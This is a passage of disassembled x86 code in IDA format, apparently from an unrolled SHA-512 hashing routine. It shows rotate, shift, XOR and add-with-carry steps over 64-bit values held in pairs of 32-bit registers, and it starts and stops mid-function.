mov [esp+170h+var_D8], ecx
mov [esp+170h+var_18], ecx
jmp short loc_415429
; ---------------------------------------------------------------------------
loc_41540D: ; CODE XREF: sub_4143D0+F41�j
mov edx, [esp+170h+var_D8]
mov ecx, [esp+170h+var_D4]
mov [esp+170h+var_18], edx
mov [esp+170h+var_14], ecx
loc_415429: ; CODE XREF: sub_4143D0+103B�j
mov ecx, [esp+170h+var_124]
mov ebx, ecx
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_124]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_120]
xor esi, ecx
mov ecx, [esp+170h+var_124]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_11C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_14C]
not ebx
and ebx, [esp+170h+var_154]
not edi
and edi, [esp+170h+var_158]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F980[eax*8]
adc esi, ds:dword_41F984[eax*8]
add edx, [esp+170h+var_18]
mov eax, [esp+170h+var_150]
adc esi, [esp+170h+var_14]
add eax, edx
adc ecx, esi
add [esp+170h+var_130], eax
mov [esp+170h+var_14C], ecx
mov [esp+170h+var_150], eax
adc [esp+170h+var_12C], ecx
mov eax, [esp+170h+var_144]
mov ecx, [esp+170h+var_148]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_148]
mov ebp, eax
shld ebp, ebx, 19h
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_13C]
xor ebp, [esp+170h+var_134]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_140]
xor edi, ecx
mov ecx, [esp+170h+var_138]
and ebp, eax
mov eax, [esp+170h+var_13C]
and eax, [esp+170h+var_134]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_150], edi
adc [esp+170h+var_14C], esi
cmp [esp+170h+var_15C], 0
jz loc_415651
mov eax, [esp+170h+var_C8]
mov ecx, [esp+170h+var_C4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_C4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_D0]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_CC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_D0]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_CC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_118]
adc edx, [esp+170h+var_114]
add ecx, [esp+170h+var_100]
adc edx, [esp+170h+var_FC]
mov [eax+88h], ecx
mov [eax+8Ch], edx
mov eax, edx
mov [esp+170h+var_118], ecx
mov [esp+170h+var_114], eax
mov [esp+170h+var_48], ecx
jmp short loc_415660
; ---------------------------------------------------------------------------
loc_415651: ; CODE XREF: sub_4143D0+1196�j
mov edx, [esp+170h+var_118]
mov eax, [esp+170h+var_114]
mov [esp+170h+var_48], edx
loc_415660: ; CODE XREF: sub_4143D0+127F�j
mov ecx, [esp+170h+var_12C]
mov ebx, ecx
mov [esp+170h+var_44], eax
mov eax, [esp+170h+var_130]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_12C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_128]
xor esi, ecx
mov ecx, [esp+170h+var_12C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_124]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_154]
not ebx
and ebx, [esp+170h+var_11C]
not edi
and edi, [esp+170h+var_120]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F988[eax*8]
adc esi, ds:dword_41F98C[eax*8]
add edx, [esp+170h+var_48]
mov eax, [esp+170h+var_158]
adc esi, [esp+170h+var_44]
add eax, edx
adc ecx, esi
add [esp+170h+var_138], eax
mov [esp+170h+var_154], ecx
mov [esp+170h+var_158], eax
adc [esp+170h+var_134], ecx
mov ecx, [esp+170h+var_150]
mov eax, [esp+170h+var_14C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_150]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edx, edx
or edx, ebp
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_140]
mov ebx, ecx
xor ebx, edx
and ebx, [esp+170h+var_148]
mov ebp, eax
xor ebp, [esp+170h+var_13C]
and eax, [esp+170h+var_13C]
and ebp, [esp+170h+var_144]
and ecx, edx
xor ebx, ecx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_158], edi
adc [esp+170h+var_154], esi
cmp [esp+170h+var_15C], 0
jz loc_41589B
mov eax, [esp+170h+var_D8]
mov ecx, [esp+170h+var_D4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_D4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_F0]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_EC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_F0]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_EC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C8]
adc edx, [esp+170h+var_C4]
add ecx, [esp+170h+var_110]
adc edx, [esp+170h+var_10C]
mov [eax+90h], ecx
mov [eax+94h], edx
mov eax, edx
mov [esp+170h+var_C8], ecx
mov [esp+170h+var_C4], eax
mov [esp+170h+var_80], ecx
jmp short loc_4158B0
; ---------------------------------------------------------------------------
loc_41589B: ; CODE XREF: sub_4143D0+13D4�j
mov edx, [esp+170h+var_C8]
mov eax, [esp+170h+var_C4]
mov [esp+170h+var_80], edx
loc_4158B0: ; CODE XREF: sub_4143D0+14C9�j
mov ecx, [esp+170h+var_134]
mov ebx, ecx
mov [esp+170h+var_7C], eax
mov eax, [esp+170h+var_138]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_134]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_130]
xor esi, ecx
mov ecx, [esp+170h+var_134]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_12C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_11C]
not ebx
and ebx, [esp+170h+var_124]
not edi
and edi, [esp+170h+var_128]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F990[eax*8]
adc esi, ds:dword_41F994[eax*8]
add edx, [esp+170h+var_80]
mov eax, [esp+170h+var_120]
adc esi, [esp+170h+var_7C]
add eax, edx
adc ecx, esi
add [esp+170h+var_140], eax
mov [esp+170h+var_11C], ecx
mov [esp+170h+var_120], eax
adc [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_158]
mov eax, [esp+170h+var_154]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_158]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_14C]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_150]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_158]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
mov ecx, [esp+170h+var_14C]
xor ebp, eax
and ebp, [esp+170h+var_144]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_120], edi
adc [esp+170h+var_11C], esi
cmp [esp+170h+var_15C], 0
jz loc_415AE1
mov eax, [esp+170h+var_E8]
mov ecx, [esp+170h+var_E4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_E4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_118]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_114]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_118]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_114]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_108]
adc edx, [esp+170h+var_104]
add ecx, [esp+170h+var_F0]
adc edx, [esp+170h+var_EC]
mov [eax+98h], ecx
mov [eax+9Ch], edx
mov eax, edx
mov [esp+170h+var_F0], ecx
mov [esp+170h+var_EC], eax
mov [esp+170h+var_78], ecx
jmp short loc_415AF6
; ---------------------------------------------------------------------------
loc_415AE1: ; CODE XREF: sub_4143D0+1626�j
mov edx, [esp+170h+var_F0]
mov eax, [esp+170h+var_EC]
mov [esp+170h+var_78], edx
loc_415AF6: ; CODE XREF: sub_4143D0+170F�j
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
mov [esp+170h+var_74], eax
mov eax, [esp+170h+var_140]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_13C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
and ecx, [esp+170h+var_134]
mov edi, eax
and eax, [esp+170h+var_138]
not ebx
and ebx, [esp+170h+var_12C]
not edi
and edi, [esp+170h+var_130]
xor ebx, ecx
mov ecx, [esp+170h+var_124]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F998[eax*8]
adc esi, ds:dword_41F99C[eax*8]
add edx, [esp+170h+var_78]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_74]
add eax, edx
adc ecx, esi
add [esp+170h+var_148], eax
mov [esp+170h+var_124], ecx
mov [esp+170h+var_128], eax
adc [esp+170h+var_144], ecx
mov eax, [esp+170h+var_11C]
mov ecx, [esp+170h+var_120]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_120]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_154]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_158]
xor edi, ecx
mov ecx, [esp+170h+var_120]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_150]
and edx, ecx
mov ecx, [esp+170h+var_154]
xor ebp, eax
and ebp, [esp+170h+var_14C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_128], edi
adc [esp+170h+var_124], esi
cmp [esp+170h+var_15C], 0
jz loc_415D29
mov eax, [esp+170h+var_C8]
mov ecx, [esp+170h+var_C4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_C4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_F8]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_F4]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_F8]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_F4]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_B8]
adc edx, [esp+170h+var_B4]
add ecx, [esp+170h+var_E8]
adc edx, [esp+170h+var_E4]
mov [eax+0A0h], ecx
mov [eax+0A4h], edx
mov eax, edx
mov [esp+170h+var_E8], ecx
mov [esp+170h+var_E4], eax
mov [esp+170h+var_68], ecx
jmp short loc_415D3E
; ---------------------------------------------------------------------------
loc_415D29: ; CODE XREF: sub_4143D0+1868�j
mov edx, [esp+170h+var_E8]
mov eax, [esp+170h+var_E4]
mov [esp+170h+var_68], edx
loc_415D3E: ; CODE XREF: sub_4143D0+1957�j
mov ecx, [esp+170h+var_144]
mov ebx, ecx
mov [esp+170h+var_64], eax
mov eax, [esp+170h+var_148]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_144]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_144]
mov ebx, ecx
and ecx, [esp+170h+var_13C]
mov edi, eax
and eax, [esp+170h+var_140]
not ebx
and ebx, [esp+170h+var_134]
not edi
and edi, [esp+170h+var_138]
xor ebx, ecx
mov ecx, [esp+170h+var_12C]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9A0[eax*8]
adc esi, ds:dword_41F9A4[eax*8]
add edx, [esp+170h+var_68]
mov eax, [esp+170h+var_130]
adc esi, [esp+170h+var_64]
add eax, edx
adc ecx, esi
add [esp+170h+var_150], eax
mov [esp+170h+var_12C], ecx
mov [esp+170h+var_130], eax
adc [esp+170h+var_14C], ecx
mov eax, [esp+170h+var_124]
mov ecx, [esp+170h+var_128]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_128]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_11C]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_120]
xor edi, ecx
mov ecx, [esp+170h+var_128]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_158]
and edx, ecx
mov ecx, [esp+170h+var_11C]
xor ebp, eax
and ebp, [esp+170h+var_154]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_130], edi
adc [esp+170h+var_12C], esi
cmp [esp+170h+var_15C], 0
jz loc_415F71
mov eax, [esp+170h+var_B0]
mov ecx, [esp+170h+var_AC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_AC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_F0]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_EC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_F0]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_EC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_A8]
adc edx, [esp+170h+var_A4]
add ecx, [esp+170h+var_F8]
adc edx, [esp+170h+var_F4]
mov [eax+0A8h], ecx
mov [eax+0ACh], edx
mov eax, edx
mov [esp+170h+var_F8], ecx
mov [esp+170h+var_F4], eax
mov [esp+170h+var_50], ecx
jmp short loc_415F80
; ---------------------------------------------------------------------------
loc_415F71: ; CODE XREF: sub_4143D0+1AB0�j
mov edx, [esp+170h+var_F8]
mov eax, [esp+170h+var_F4]
mov [esp+170h+var_50], edx
loc_415F80: ; CODE XREF: sub_4143D0+1B9F�j
mov ecx, [esp+170h+var_14C]
mov ebx, ecx
mov [esp+170h+var_4C], eax
mov eax, [esp+170h+var_150]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_14C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_148]
xor esi, ecx
mov ecx, [esp+170h+var_14C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_144]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_134]
not ebx
and ebx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_140]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9A8[eax*8]
adc esi, ds:dword_41F9AC[eax*8]
add edx, [esp+170h+var_50]
mov eax, [esp+170h+var_138]
adc esi, [esp+170h+var_4C]
add eax, edx
adc ecx, esi
add [esp+170h+var_158], eax
mov [esp+170h+var_134], ecx
mov [esp+170h+var_138], eax
adc [esp+170h+var_154], ecx
mov ecx, [esp+170h+var_130]
mov eax, [esp+170h+var_12C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_130]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_124]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_128]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_130]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_120]
and edx, ecx
mov ecx, [esp+170h+var_124]
xor ebp, eax
and ebp, [esp+170h+var_11C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_138], edi
adc [esp+170h+var_134], esi
cmp [esp+170h+var_15C], 0
jz loc_4161C3
mov eax, [esp+170h+var_C0]
mov ecx, [esp+170h+var_BC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_BC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_E8]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_E4]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_E8]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_E4]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D0]
adc edx, [esp+170h+var_CC]
add ecx, [esp+170h+var_B0]
adc edx, [esp+170h+var_AC]
mov [eax+0B0h], ecx
mov [eax+0B4h], edx
mov eax, edx
mov [esp+170h+var_B0], ecx
mov [esp+170h+var_AC], eax
mov [esp+170h+var_40], ecx
jmp short loc_4161D8
; ---------------------------------------------------------------------------
loc_4161C3: ; CODE XREF: sub_4143D0+1CF6�j
mov edx, [esp+170h+var_B0]
mov eax, [esp+170h+var_AC]
mov [esp+170h+var_40], edx
loc_4161D8: ; CODE XREF: sub_4143D0+1DF1�j
mov ecx, [esp+170h+var_154]
mov [esp+170h+var_3C], eax
mov eax, [esp+170h+var_158]
mov ebx, ecx
xor esi, esi
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
mov edx, ecx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
xor ebx, ebx
or ebx, ebp
mov ebp, [esp+170h+var_154]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
shr ebp, 0Eh
or ecx, ebp
mov ebp, [esp+170h+var_150]
xor esi, ecx
mov ecx, [esp+170h+var_154]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_14C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_144]
xor edi, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9B0[eax*8]
mov edi, [esp+170h+var_12C]
adc esi, ds:dword_41F9B4[eax*8]
add edx, [esp+170h+var_40]
mov eax, [esp+170h+var_140]
adc esi, [esp+170h+var_3C]
add eax, edx
adc ecx, esi
add [esp+170h+var_120], eax
mov esi, [esp+170h+var_130]
mov [esp+170h+var_140], eax
adc [esp+170h+var_11C], ecx
mov [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_138]
mov eax, esi
xor eax, ecx
mov [esp+170h+var_98], eax
mov eax, [esp+170h+var_134]
mov edx, edi
xor edx, eax
mov [esp+170h+var_94], edx
mov edx, esi
and edx, ecx
mov [esp+170h+var_90], edx
mov edx, edi
and edx, eax
mov [esp+170h+var_8C], edx
mov edx, ecx
xor esi, esi
shl edx, 4
mov edi, ecx
mov ebx, eax
shrd edi, ebx, 1Ch
shr ebx, 1Ch
or edx, ebx
or esi, edi
mov ebp, eax
shld ebp, ecx, 1Eh
xor ebx, ebx
shl ecx, 1Eh
or ebx, ebp
mov edi, eax
xor edx, ebx
mov ebx, [esp+170h+var_138]
shr edi, 2
or edi, ecx
mov ecx, eax
shld eax, ebx, 19h
xor esi, edi
shr ecx, 7
xor edi, edi
or edi, eax
mov eax, [esp+170h+var_98]
and eax, [esp+170h+var_128]
shl ebx, 19h
xor eax, [esp+170h+var_90]
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_94]
and ecx, [esp+170h+var_124]
xor edx, edi
xor ecx, [esp+170h+var_8C]
add esi, eax
adc edx, ecx
add [esp+170h+var_140], esi
adc [esp+170h+var_13C], edx
cmp [esp+170h+var_15C], 0
jz loc_41643F
mov eax, [esp+170h+var_A0]
mov ecx, [esp+170h+var_9C]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
